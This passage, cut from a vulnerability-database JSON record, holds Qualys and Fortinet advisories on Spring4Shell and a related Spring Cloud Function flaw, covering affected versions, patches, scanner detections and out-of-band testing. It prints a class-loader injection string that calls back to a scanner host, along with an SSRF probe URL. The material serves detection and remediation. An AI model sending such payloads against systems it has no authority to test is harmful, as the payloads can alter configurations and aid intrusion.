"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T02:30:00", "id": "PA-CVE-2022-22963", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-04-08T16:57:59", "description": "_This page last updated: April 7th_\n\nA new zero-day Remote Code Execution (RCE) vulnerability, \u201cSpring4Shell\u201d or \u201cSpringShell\u201d was disclosed in the Spring framework. An unauthorized attacker can exploit this vulnerability to remotely execute arbitrary code on the target device. \n\n### What is Spring Framework? \n\nSpring-core is a prevalent framework widely used in Java applications that allows software developers to develop Java applications with enterprise-level components effortlessly. \n\n### Which versions are vulnerable? \n\nThe vulnerability requires JDK version 9 or later to be running. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions are vulnerable. It allows remote attackers to plant a web shell when running Spring framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger to allow full remote access. \n\n### How can this be exploited? \n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. This property could enable an attacker to leverage Spring4Shell against a vulnerable application. In fact, the Spring framework class DataBinder warns about this in its [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>): \n\n\u201cNote that there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data, for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases, this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\u201d \n\n### What are the prerequisites to exploit this vulnerability? \n\n * JDK 9 or higher \n * Apache Tomcat as the Servlet container \n * Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) \n * spring-webmvc or spring-webflux dependency \n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions \n\n### Is there a patch available for Spring4Shell? \n\nSpring Framework 5.3.18 and 5.2.20, that contain the fixes, have been released. If you\u2019re able to upgrade to Spring Framework **5.3.18** and **5.2.20**, no workarounds are necessary. \n\nIn case you cannot update to the latest Spring Framework version upgrading to Apache Tomcat **10.0.20**, **9.0.62**, or **8.5.78** provides adequate protection but not solves the vulnerability completely. \n\nIn addition, there are multiple working proof-of-concept (PoC) exploits available for Spring4Shell. We strongly recommend that organizations deploy these mitigations or use a third-party firewall for defense. \n\n### Qualys Coverage \n\nQualys Research Team has released the following authenticated QIDs to address this vulnerability for now. These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.438-3 and in Cloud Agent manifest version LX_MANIFEST-2.5.438.3-2. \n\n**QID**| **Title**| **Version**| **Available for** \n---|---|---|--- \n376506| Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n45525| Spring core or Spring beans jar detected| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n150494| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)| VULNSIGS-2.5.440-3| Web Application Security \n376508| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Authenticated)| VULNSIGS-2.5.440-6/ lx_manifest-2.5.440.6-5| Scanner/Cloud Agent \n730418| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Unauthenticated Check)| VULNSIGS-2.5.440-6| Scanner \n150495 | Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell) | VULNSIGS-2.5.443-3 | Web Application Security \n48209 | Spring Framework and Spring Boot JARs Spring Cloud JARs Detected Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376514 | Spring Framework Remote Code Execution (RCE) Vulnerability (Spring4Shell) Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376520 | Spring Cloud Function Remote Code Execution (RCE) Vulnerability Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n730416 | Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell) (Unauthenticated Check) | VULNSIGS-2.5.445-3 | Scanner \n \n### Discover Your Attack Surface with up-to-date CyberSecurity Asset Management \n\nAs a first step, Qualys recommends assessing all assets in your environment to map the entire attack surface of your organization. \n\n#### Scoping Potential Attack Surface \n\nQualys Cybersecurity Asset Management (CSAM) continuously inventories all your assets and software. Use CSAM to find assets with Apache Tomcat running on JDK 9 or higher. \n \n \n QQL: _software:(name:tomcat) and software:(name:\"jdk\" and version>=9)___ \n\n\n\n#### Finding Vulnerable Spring Components and Versions \n\nQualys CSAM can further help you narrow down the scope by adding Spring Framework to the search criteria, and specifically match on vulnerable components and versions. This can be used to find assets that have not yet been scanned with VMDR for the Spring4Shell QIDs yet. \n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Monitoring Upgrades and Mitigations \n\nUpgrading to Spring Framework 5.3.18+ or 5.2.20+ addresses the root cause and prevents other attack vectors, and it adds protection for other CVEs. Qualys CSAM allows customers to list all Spring Framework versions and verify upgrades. \n\nHowever, some may be in a position where upgrading is not possible to do quickly. VMware provided the mitigation alternative to upgrade Apache Tomcat to versions 10.0.20, 9.0.62, or 8.5.78, which close the attack vector on Tomcat\u2019s side. Qualys CSAM allows you to check for the presence or absence of these Tomcat updates. \n\nQQL for assets with mitigated Tomcat: \n \n \n software:(name:tomcat and update:[`10.0.20`,`9.0.62`,`8.5.78`]) \n\nQQL for assets excluding mitigated Tomcat: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Context Is Critical to Prioritize and Remediate \n\nSecurity teams need to understand the distribution of affected assets from different perspectives, such as internet-exposed, production versus non-production, and which of these assets support business-critical services. Qualys CSAM integrates with additional sources, to import asset and business context, that helps customers further understand their impact, prioritize assets based on business criticality, and work with corresponding asset owners and support groups to take remedial actions. \n\nQQL for assets with Tomcat exposed to the internet and visible in Shodan: \n \n \n software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and tags.name:shodan \n\n\n\n### Detect the Vulnerability with Qualys WAS\n\nSecond, protect your public Internet-facing apps, as they are the most exposed to attack and therefore high priority. \n\nThe Qualys WAS Research Team has developed two signatures for detecting vulnerable versions of the Spring Framework. \n\n * QID 150494 (released April 1st) will report vulnerable versions of Spring Cloud Applications (CVE-2022-22963). \n * QID 150495 (released on 6th) will report vulnerable versions of Spring Core Applications (CVE-2022-22965). \n\nThese QIDs are automatically added to the Core Detection Scope. If you are scanning web applications with the Initial WAS Option Profile then there is no further action necessary. Your scans will automatically test for vulnerable versions of the Spring Framework and report any vulnerable instances found. \n\nIf you are using a custom Option Profile for your scans, please ensure you are either using the Core Detection Scope in your Option Profile or adding the above QIDs to any static or dynamic Custom Search Lists. \n\n\n\nThese QIDs collectively use a combination of Out-of-Band and non-Out-of-Band tests for accurate detection. \n\n\n\nThe WAS Research Team is investigating other safe methods for detecting this vulnerability to compensate for potential False Negatives or False Positive cases. In the meantime, it is recommended to use WAS in coordination with other Qualys modules for a more comprehensive methodology for detecting the Spring4Shell vulnerability. \n\nIf your application is vulnerable to Spring4Shell, it is recommended that you immediately follow the steps outlined in the \u201cIs there a patch available for Spring4Shell?\u201d section of this blog. \n\n### Detect Spring4Shell Vulnerability Using Qualys VMDR\n\nNext, it\u2019s time to find Spring4Shell wherever it is hiding in your environment and prioritize your response. \n\nQualys VMDR customers should ensure all their assets are scanned against the above QIDs. As this vulnerability only targets the Spring Framework when deployed with JDK>9 and Tomcat, customers must at least ensure assets with Tomcat and JDK>9 are scanned. The following QQL can be used to find such assets: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) \n\n\n\nOnce assets have been scanned for the above QIDs, customers can use the following QQL to search for the Spring4Shell vulnerability in their environment: \n\nvulnerabilities.vulnerability.qid:376506 \n\n\n\n### Track Spring4Shell Progress with Unified Dashboard\n\nThe Unified Dashboard enables you to track this vulnerability and its impacted hosts, their status, and overall management in real-time. To help you quickly find vulnerable hosts and software, a new unified dashboard is created on the Qualys platform. This dashboard has extremely useful widgets listing all the vulnerable hosts, applications with vulnerable versions of Spring, and most importantly all the vulnerable hosts visible on the Internet. It provides visibility to compliance configurations and software on your \u2018External Attack Surface\u2019 visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) being the low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure and that have public IP addresses. To use this capability, download and import this Global Dashboard. \n\n[[Download and import \u201cSpring4Shell\u201d Global Dashboard](<https://2jws2s3y97dy39441y2lgm98-wpengine.netdna-ssl.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard.zip>)](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)\n\n\n\n### Detect Spring4Shell Vulnerabilities in Running Containers & Images\n\nIf you run Apache Tomcat in containers, then it is critical that you check for Spring4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Spring4Shell vulnerabilities in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376506(CVE-2022-22965) \n * QID 376508 (CVE-2022-22963 \n\nTo detect vulnerabilities in running containers, you must deploy the Container Security sensor in \u201cGeneral\u201d mode on the hosts running the containers. You can view the containers impacted by these vulnerabilities by navigating to the \u201cContainer Security\u201d application, then selecting the \u201cAssets-> Container\u201d tab, and using the following QQL query: \n\nvulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Spring4Shell vulnerabilities. Catching and remediating Spring4Shell vulnerabilities in container images will eliminate exposure to the vulnerabilities when the image is instantiated as a container. \n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the \u201cAssets -> Images\u201d tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the image and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Spring4Shell, across the entire lifecycle of the container from build time to runtime. \n\n### Remediate Spring4Shell Using Qualys Patch Management\n\nThe recommended way to patch this vulnerability is by updating to Spring Framework 5.3.18 and 5.2.20 or greater. Customers can use Patch Management\u2019s install software action to download and script the upgrade. Note that customers can create a patch job that only includes the install/script action, in such case there is no need to add patches to the job. Alternatively, if upgrading the Spring Framework is not possible, customers can use Qualys patch management to patch Tomcat to versions: 10.0.20, 9.0.62, or 8.5.78. Tomcat patches are supported out-of-the-box and require no special configuration. \n\n\n\n### Detect Spring4Shell Exploitation Attempts with Qualys XDR\n\nAn important last step in confronting Spring4Shell is to ensure that your organization has not already been targeted by attacks that exploit this vulnerability. \n\nThe Qualys Threat Intelligence team has released the following XDR correlation rules for detecting Remote Code Execution exploitation attempts. These rules are available today via your TAM for quick import and implementation and will be delivered as part of a rule pack in a future XDR release. \n\nT1190 - [Palo Alto Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Check Point IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Fortinet Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Trend Micro TippingPoint IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\n### FAQ: \n\n#### Is this vulnerability related to CVE-2022-22963? \n\nThere is some confusion about this zero-day vulnerability due to another unrelated Spring vulnerability (CVE-2022-22963) published on March 29, 2022. This vulnerability, CVE-2022-22963, impacts Spring Cloud Function, which is not in Spring Framework. \n\nQIDs 376508 and 730418 are available to address this CVE. \n\n#### What is the detection logic for QID 376506: Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)? \n\nQID 376506 is an authenticated check currently supported on Linux and Windows Operating Systems. \n\nOn Linux systems, detection checks if system has java 9 or later versions and executes \u2018locate\u2019 and \u2018 ls -l /proc/*/fd \u2018 to checks if one of the \u2018 spring-webmvc-*.jar \u2018, \u2018 spring-webflux*.jar \u2018 or \u2018 spring-boot.*jar \u2018 present on the system. \n\nOn Windows system, detection checks vulnerable instances of Spring via WMI to check spring-webmvc, spring-webflux and spring-boot are included in the running processes via command-line with JDK9 or higher. \n\nContainer Sensor image scanning uses find command to check for spring-webmvc, spring-webflux and spring-boot jars from .war files along with JDK9 or higher. \n\n#### Under what situations would QID 376506 not detect the vulnerability? \n\nQID 376506 might not be detected if access to /proc/*/fd is restricted or if the spring-core or spring-beans file is embedded inside other binaries, such as jar, war, etc. \n\nFurthermore, this QID might not be detected if the locate command is not available on the target. Targets on Java versions less than 9 are not vulnerable. \n\n#### What is the detection logic for QID 730416 (unauthenticated check)? \n\nQID 730416 is a remote unauthenticated check. It sends a specially crafted HTTP GET request to the remote web application and tries to get a callback on scanner using payload: \n \n \n \"?class.module.classLoader.resources.context.configFile=http://<Scanner_IP>:<Random_port>&class.module.classLoader.resources.context.configFile\" \n\nQID 730416 is an intrusive check. The payload used in the detection may in some cases change the Spring configuration on the target application which can hamper the application's logging capabilities. \n\n#### Under what conditions would QID 730416 not work? \n\nQID 730416 will not work if the following conditions are present: \n\n * "Do not exclude Intrusive checks" is not enabled in Scan Option Profile \n * This QID only checks for the vulnerability at root URI. If the vulnerability lies in non-root URIs, the QID would not be detected. \n * If communication from host to scanner is blocked. \n * The payload gets blocked by a firewall, IPS, etc. that is between the host and the scanner. \n\n### Updates\n\n**Update \u2013 April **7 \n\nA new QID (730416) was added to address CVE-2022-22963 under \u201cQID Coverage\u201d. \n\n**Update \u2013 April 6** \n\nSeveral new QIDs to address CVE-2022-22963 are now available under \u201cQID Coverage\u201d. The CSAM section has been expanded. \n\n**U****pdate \u2013 April 5****** \n\nGuidance added for detection using Qualys CSAM, VMDR and XDR, and tracking remediation progress using Unified Dashboards and Patch Management. \n\n**Update \u2013 April 4**** ** \n\nQualys has added a [scan utility](<https://github.com/Qualys/spring4scanwin>) for Windows and [scan utility](<https://github.com/Qualys/spring4scanlinux>) for Linux to scan the entire hard drive(s), including archives (and nested JARs,) that indicate the Java application contains a vulnerable Spring Framework or Spring Cloud library. \n\n**Update \u2013 April 1** \n\nNew QIDs to address CVE-2022-22963 are now available. See section \u201cQID Coverage\u201d section. \n\n**Update \u2013 March 31** \n\nCVE-2022-22965 is now assigned to this vulnerability. Qualys Research Team has released QIDs as of March 30 and will keep updating those QIDs as new information is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T09:00:00", "type": "qualysblog", "title": "Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T09:00:00", "id": "QUALYSBLOG:6DE7FC733B2FD13EE70756266FF191D0", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-06T22:09:26", "description": "Qualys previously announced the introduction of [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) in 2020. This technology allows [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) to detect out-of-band vulnerabilities such as [server-side request forgery](<https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/>) (SSRF). [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>). This article will provide more detail on the common questions/situations seen with out-of-band detections. \n\nAs of publishing, the vulnerability detections that utilize [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) are:\n\n * QID 150055 \u2013 OS Command Injection\n * QID 150179 \u2013 Blind XXE injection\n * QID 150255 \u2013 SMTP Header Injection\n * QID 150258 \u2013 Server-Side Request Forgery (SSRF)\n * QID 150267 \u2013 Oracle WebLogic Remote Code Execution Vulnerability (CVE-2019-2725)\n * QID 150278 \u2013 DNN RCE Vulnerability (CVE-2017-9822)\n * QID 150279 \u2013 Jira Server Side Request Forgery (SSRF) Vulnerability CVE-2019-8451)\n * QID 150298 \u2013 SSRF to AWS Metadata Service\n * QID 150307 \u2013 External Service Interaction via HTTP Header Injection\n * QID 150339 \u2013 Oracle WebLogic Server Unauthenticated Remote Code Execution Vulnerability\n * QID 150364 - Keycloak SSRF Vulnerability (CVE-2020-10770)\n * QID 150426 - Adobe Experience Manager: SSRF via Salesforce Secret Servlet\n * QID 150427 - Adobe Experience Manager: SSRF via Reporting Services Servlet\n * QID 150428 - Adobe Experience Manager: SSRF via Site Catalyst Servlet\n * QID 150429 - Adobe Experience Manager: SSRF via Auto Provisioning Servlet\n * QID 150430 - Adobe Experience Manager: SSRF via Opensocial\n * QID 150440 - Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n * QID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n * QID 150445 - Apache Solr SSRF Vulnerability (CVE-2021-27905)\n * QID 150494 - Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)\n * QID 150495 - Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell)\n * QID 150498 WordPress AnyComment Plugin: Arbitrary HyperComments Import/Revert via CSRF Vulnerability (CVE-2022-0134)\n * QID 150503 - NodeJS Command Injection Vulnerability (CVE-2021-21315)\n * QID 150504 - Apache Struts 2 Remote Code Execution Vulnerability (CVE-2021-31805)\n * QID 150557 - Apache Spark Shell Command Injection Vulnerability (CVE-2022-33891)\n * QID 150574 - Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-3680\n\n# Functionality\n\nThe detection mechanism consists of the following steps:\n\n 1. When Qualys WAS scans a web application for out-of-band vulnerabilities, it fuzzes/injects the fields with specially-crafted payloads. Different payloads are used for different vulnerability types. In this example, WAS scans the web app at \u201cwww.example.com\u201d. Imagine this web app includes functionality to display an image that is retrieved from a specific URL. To test for SSRF, a request similar to the one below would be sent by the scanner. Here we see the field being fuzzed is the \u201curl\u201d query string parameter, and the specific payload is for SSRF.https://www.example.com/loadImage?url=http%3A%2F%2F2a3b948a2b0a.1463985_40627.1466122137.ssrf01.ssrf.in03.qualysperiscope.com\n 2. If the scanned web application is vulnerable, it tries to make the following HTTP request but first must resolve the FQDN having a domain of qualysperiscope.com mentioned in the payload. \nhttp://2a3b948a2b0a.1463985_40627.1466122137.ssrf01.ssrf.in03.qualysperiscope.com\n 3. Now, as a part of the DNS resolution process, the request will hit [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>)\u2019s DNS service. The DNS service initially processes the request to verify the hash embedded in the request is valid. This ensures the lookup request is genuine and was generated from a WAS scan. Once everything is verified, [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) logs the request internally. If verification fails, the request is simply dropped.\n 4. Subsequently, Qualys WAS will ask for the lookup request data from [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) along with the scan ID and a hash. [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) again verifies the hash and serves the external request data corresponding to that scan ID (if present). \nThe data received from [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) is in JSON as below: \n{ "lookup": "A-record" "request": "2a3b948a2b0a.1463985_40627.1466122137.ssrf01.ssrf.in03.qualysperiscope.com", } \n\n 5. Web Application Scanning (WAS) processes the data received from [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>), and reports the vulnerabilities corresponding to the payload which were successfully executed.\n\n# Request Source IP Address\n\nQualys WAS sends a unique URL for each vulnerability test. This allows a correlation between the injected value and the request received by [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>). We can be sure which injection caused the external service interaction. What may be less clear is what system made that request to [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>).\n\nAs the detection is executed against an application, the injection point is known. This is apparent from the QIDs:\n\nQID 150557 - Apache Spark Shell Command Injection Vulnerability (CVE-2022-33891)\n\nQID 150258 \u2013 Server-Side Request Forgery (SSRF)\n\nSince unique dynamic URLs are used, the address must be resolved via DNS. Typically, the target application will not resolve the DNS itself. A DNS resolver will query through the DNS hierarchy to resolve the address. Therefore, the DNS request that comes to the [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) server may be from a DNS resolver or other system that is not the target application/server. The numerous devices/software in a networked system can lead to any number of devices being the source of the DNS request. Proxies, reverse proxies, firewalls, web application firewalls, load balancers, host-based security software, etc., could all potentially issue the request, and we have observed cases where that has occurred. \n\n## Potential \u201cFalse Positives\u201d\n\nWhen a [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) detection occurs during a CVE-based QID, you can be assured it is valid. However, there are times when the non-CVE detection could be false positives. Take a contact form on an application. This form takes a name and a message. If Qualys WAS injects the Periscope URL in the message body, most likely, the email will be sent. This email then hits an email security appliance that performs a reputation check on the URL. There is no history for the URL as it is dynamically created, so the service visits the URL to evaluate it. First, it must resolve the DNS address, which would result in the [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) server receiving the request from the email security provider. A similar situation may occur if the request with Periscope URL results in an error. This error could be logged, and an email is sent to the application administrator. As the URL is now in an email, the email security system checks the URL and results in a hit to [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>).\n\n## Potential False Negatives\n\nInternal systems may not have Internet access which is required to reach our [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) system. If a proxy is required, the injected URL cannot use that path. SSRF does not need to reach out to a network to cause issues. If an attacker has knowledge of the internal network, they could use SSRF to pivot/make requests to an internal server. \n\n# Final Thoughts\n\nEven when a different system makes the request, it is advised to mitigate the issue at the application level. Focus on the injection point in the scan report. Should this field, parameter, and header value accept untrusted URLs? Applications should not accept untrusted input. If you must accept URLs, whitelist the approved URLs.\n\nUltimately, the customer's organization is better equipped to investigate false positives than Qualys support. Because unique URLs are utilized, Qualys can be confident the scan did trigger a system to make the DNS request. Application owners/developers and network engineers should know the inner workings of systems necessary to determine where the request originated. As [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) is not available outside of scan, if additional testing or verification is needed, consider using [interactsh](<https://github.com/projectdiscovery/interactsh>) available [here](<https://github.com/projectdiscovery/interactsh>), or the hosted version at [app.interactsh.com](<http://app.interactsh.com/>). Once the vulnerability is addressed, rescan with Qualys WAS to close the detection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-01T23:11:35", "type": "qualysblog", "title": "Identify Server-Side Attacks Using Qualys Periscope", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9822", "CVE-2019-2725", "CVE-2019-8451", "CVE-2020-10770", "CVE-2021-21315", "CVE-2021-27905", "CVE-2021-31805", "CVE-2021-44228", "CVE-2022-0134", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-33891", "CVE-2022-3680"], "modified": "2022-12-01T23:11:35", "id": "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "href": "https://blog.qualys.com/category/qualys-insights", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fortinet": [{"lastseen": "2023-07-01T14:08:27", "description": "Two distinct spring project vulnerabilities where released recently with critical CVSS score and classified as zero-Day attacks. \nThe two vulnerabilities are currently known as : \nCVE-2022-22965 or Spring4Shell: \nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. \nhttps://tanzu.vmware.com/security/cve-2022-22965 \n[https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1](<https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1>) \nCVE-2022-22963: \nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing \nfunctionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that \nmay result in access to local resources. \n<https://tanzu.vmware.com/security/cve-2022-22963>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "fortinet", "title": "CVE-2022-22965 and CVE-2022-22963 vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 